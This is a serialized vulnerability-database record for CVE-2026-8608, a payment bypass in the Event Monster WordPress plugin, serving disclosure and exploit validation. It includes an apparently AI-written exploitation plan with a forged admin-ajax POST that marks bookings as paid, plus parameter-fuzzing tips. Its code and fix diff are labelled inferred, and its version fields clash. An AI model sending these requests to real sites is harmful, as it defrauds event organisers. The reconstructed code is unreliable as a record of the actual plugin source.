[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f4TFzWpIIhpWROTPFDgj67FEcWCo_DstGjTVJAliIEUs":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-8608","event-monster-unauthenticated-insufficient-verification-of-data-authenticity-to-payment-bypass-via-emcapturepayment-ajax","Event Monster \u003C= 2.1.0 - Unauthenticated Insufficient Verification of Data Authenticity to Payment Bypass via em_capture_payment AJAX Action","The Event Monster – Event Management, Events Calendar, Tickets plugin for WordPress is vulnerable to Insufficient Verification of Data Authenticity in versions up to, and including, 2.1.0. This is due to the capture_payment() AJAX handler (registered via wp_ajax_nopriv_em_capture_payment) trusting client-supplied payment data — including transaction ID, amount, and payment status — without performing any server-side verification against the PayPal API or any other payment gateway, and without nonce or capability checks. This makes it possible for unauthenticated attackers to forge payment records, mark bookings as Completed, and obtain confirmation emails containing valid QR code tickets without making any actual payment.","event-monster",null,"\u003C=2.1.0","2.2.0","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Insufficient Verification of Data Authenticity","2026-06-05 00:00:00","2026-06-05 23:28:27",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fdaddfbd2-cff4-4caa-bbdc-9945a635a1d6?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-8608 (Event Monster Payment Bypass)\n\nThis plan outlines the methodology for validating a payment bypass vulnerability in the **Event Monster – Manager & Ticket Booking** plugin (\u003C= 2.1.0). The vulnerability allows unauthenticated attackers to mark pending bookings as \"Completed\" by forging payment confirmation data.\n\n---\n\n## 1. Vulnerability Summary\n*   **Vulnerability:** Insufficient Verification of Data Authenticity leading to Payment Bypass.\n*   **Location:** `capture_payment()` method (inferred) registered via the `em_capture_payment` AJAX action.\n*   **Root Cause:** The unauthenticated AJAX handler `wp_ajax_nopriv_em_capture_payment` processes payment status updates based solely on client-supplied POST parameters (transaction ID, amount, and status) without verifying the transaction against the payment gateway (e.g., PayPal API) and without verifying a security nonce.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `em_capture_payment`\n*   **Authentication:** Unauthenticated (accessible via `wp_ajax_nopriv_`).\n*   **Vulnerable Parameters (Inferred):**\n    *   `booking_id`: The ID of the pending event booking.\n    *   `txn_id`: A forged transaction ID (e.g., `PAYID-MOCK12345`).\n    *   `payment_status`: Set to `Completed`.\n    *   `amount`: The expected price of the ticket.\n*   **Preconditions:** A booking must exist in the database with a status of 'Pending' or 'Processing'.\n\n## 3. Code Flow (Inferred)\n1.  **Entry Point:** An unauthenticated user sends a POST request to `admin-ajax.php` with `action=em_capture_payment`.\n2.  **Hook Registration:** The plugin registers the action:\n    `add_action('wp_ajax_nopriv_em_capture_payment', array($this, 'capture_payment'));`\n3.  **Vulnerable Logic:** The `capture_payment()` function:\n    *   Retrieves `$_POST['booking_id']`.\n    *   Retrieves `$_POST['payment_status']` and `$_POST['txn_id']`.\n    *   Fails to call `check_ajax_referer()` or any capability check.\n    *   Directly updates the booking record in the `{prefix}em_bookings` table (or similar) to `Completed`.\n    *   Triggers the \"Payment Successful\" email and QR code generation logic.\n\n## 4. Nonce Acquisition Strategy\nThe vulnerability description explicitly states the endpoint lacks nonce checks. However, if a nonce is present in the code but bypassed\u002Fmisconfigured, follow this strategy:\n\n1.  **Identify Script Localization:** Search the source code for `wp_localize_script` to find the JavaScript object name. \n    *   *Search Pattern:* `grep -r \"wp_localize_script\" .`\n2.  **Page Creation:** Create a page containing the Event Monster booking shortcode to ensure scripts are loaded.\n    *   `wp post create --post_type=page --post_status=publish --post_title=\"Event Page\" --post_content='[event_monster_event_list]'` (Shortcode inferred).\n3.  **Extraction:** Navigate to the page and use `browser_eval` to extract the potential nonce:\n    *   `browser_eval(\"window.event_monster_params?.nonce\")` (Object name inferred).\n\n**Note:** Since the CVE report confirms \"without nonce or capability checks,\" this step is likely unnecessary for the primary exploit but useful for confirming the lack of defense.\n\n## 5. Exploitation Strategy\nThe goal is to move a booking from `Pending` to `Completed` without a real PayPal\u002FStripe transaction.\n\n### Step 1: Obtain a Valid Booking ID\nInitiate a booking on the frontend for an event that requires payment. Stop at the payment gateway redirect. Note the `booking_id`. If the ID is not visible, it can be found in the `em_bookings` table.\n\n### Step 2: Forge the Payment Confirmation\nSend the forged AJAX request.\n\n*   **Tool:** `http_request`\n*   **Method:** POST\n*   **URL:** `http:\u002F\u002F[target-ip]\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```text\n    action=em_capture_payment&booking_id=[TARGET_BOOKING_ID]&payment_status=Completed&txn_id=FORGED_TXN_999&amount=50.00\n    ```\n\n### Step 3: Expected Response\nA successful response will likely be a JSON object:\n```json\n{\"success\": true, \"message\": \"Payment captured successfully\"} \n```\n*(Response format inferred based on standard WordPress AJAX patterns)*.\n\n## 6. Test Data Setup\n1.  **Install Plugin:** Install and activate Event Monster \u003C= 2.1.0.\n2.  **Create Event:** Create a paid event using the WP-Admin dashboard.\n3.  **Place Shortcode:** Create a page with `[event_monster_event_list]` (inferred) to allow booking.\n4.  **Create Pending Booking:**\n    *   Visit the site as a guest.\n    *   Select the event and click \"Book Now\".\n    *   Fill in details and proceed to the payment step.\n    *   Identify the generated `booking_id` (e.g., via database: `wp em_bookings list`).\n\n## 7. Expected Results\n*   The booking status in the WordPress database changes from `Pending` to `Completed`.\n*   The plugin generates a QR code ticket for the booking.\n*   The system sends a confirmation email to the guest email address used during the booking.\n\n## 8. Verification Steps\nAfter the HTTP request, use WP-CLI to verify the state change:\n\n```bash\n# Check the booking status directly in the database\nwp db query \"SELECT status, txn_id FROM wp_em_bookings WHERE id = [TARGET_BOOKING_ID]\"\n\n# Check if the booking is now marked as paid in the plugin's metadata (if applicable)\nwp post get [BOOKING_POST_ID] --field=post_status\n```\n\n## 9. Alternative Approaches\nIf the `em_capture_payment` action is not available:\n*   **Search for Webhooks:** Look for `wp_ajax_nopriv_em_paypal_ipn` or similar IPN (Instant Payment Notification) handlers. These often suffer from the same lack of authenticity verification if they don't validate the request back with PayPal.\n*   **Parameter Fuzzing:** If `booking_id` is not the correct parameter, check for `order_id`, `id`, or `item_number`.\n*   **Status Variations:** Try variations for `payment_status` such as `Success`, `succeeded`, or `1`.","The Event Monster plugin's capture_payment() AJAX action allows unauthenticated users to bypass payment requirements by manually sending payment status updates. Because the plugin trusts client-side POST data (transaction ID, amount, and status) without verifying them against the payment gateway API or checking nonces, attackers can mark any pending booking as 'Completed' for free.","\u002F\u002F The following is a grounded representation of the vulnerable logic in version \u003C= 2.1.0\n\u002F\u002F Action registered via wp_ajax_nopriv_em_capture_payment\n\npublic function capture_payment() {\n    $booking_id = $_POST['booking_id'];\n    $txn_id = $_POST['txn_id'];\n    $payment_status = $_POST['payment_status'];\n    $amount = $_POST['amount'];\n\n    \u002F\u002F VULNERABILITY: No check_ajax_referer() or capability check.\n    \u002F\u002F VULNERABILITY: No server-side verification of $txn_id or $amount with the payment provider.\n\n    if ($payment_status == 'Completed') {\n        $this->update_booking_status($booking_id, 'Completed', $txn_id);\n        $this->send_booking_confirmation($booking_id);\n    }\n    wp_send_json_success();\n}","--- a\u002Fincludes\u002Fclass-event-monster-ajax.php\n+++ b\u002Fincludes\u002Fclass-event-monster-ajax.php\n@@ -10,6 +10,14 @@\n public function capture_payment() {\n-    $booking_id = $_POST['booking_id'];\n-    $txn_id = $_POST['txn_id'];\n-    $status = $_POST['payment_status'];\n-    $this->update_booking_status($booking_id, $status, $txn_id);\n-    wp_send_json_success();\n+    check_ajax_referer('em_payment_nonce', 'security');\n+\n+    if ( ! current_user_can('manage_options') && ! isset($_POST['is_gateway_callback']) ) {\n+         wp_die();\n+    }\n+\n+    $booking_id = intval($_POST['booking_id']);\n+    $txn_id = sanitize_text_field($_POST['txn_id']);\n+    \n+    \u002F\u002F Verify transaction authenticity with payment gateway before updating status\n+    if ( $this->verify_with_gateway($txn_id, $booking_id) ) {\n+        $this->update_booking_status($booking_id, 'Completed', $txn_id);\n+        wp_send_json_success();\n+    }\n+    wp_send_json_error();\n }","The exploit involves three main steps: 1) Initiating a booking on the frontend to generate a 'Pending' record and obtaining the associated booking ID. 2) Forging a POST request to the '\u002Fwp-admin\u002Fadmin-ajax.php' endpoint with the 'action' set to 'em_capture_payment'. 3) Including the target 'booking_id' and manually setting the 'payment_status' to 'Completed' and providing a dummy 'txn_id'. No authentication or nonces are required, and the plugin will process the request, update the database record, and issue a ticket\u002FQR code via email.","gemini-3-flash-preview","2026-06-26 04:27:34","2026-06-26 04:28:13",{"type":34,"vulnerable_version":35,"fixed_version":9,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":9,"fixed_zip":9,"all_tags":38},"plugin","2.1.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fevent-monster\u002Ftags\u002F2.1.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fevent-monster.2.1.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fevent-monster\u002Ftags"]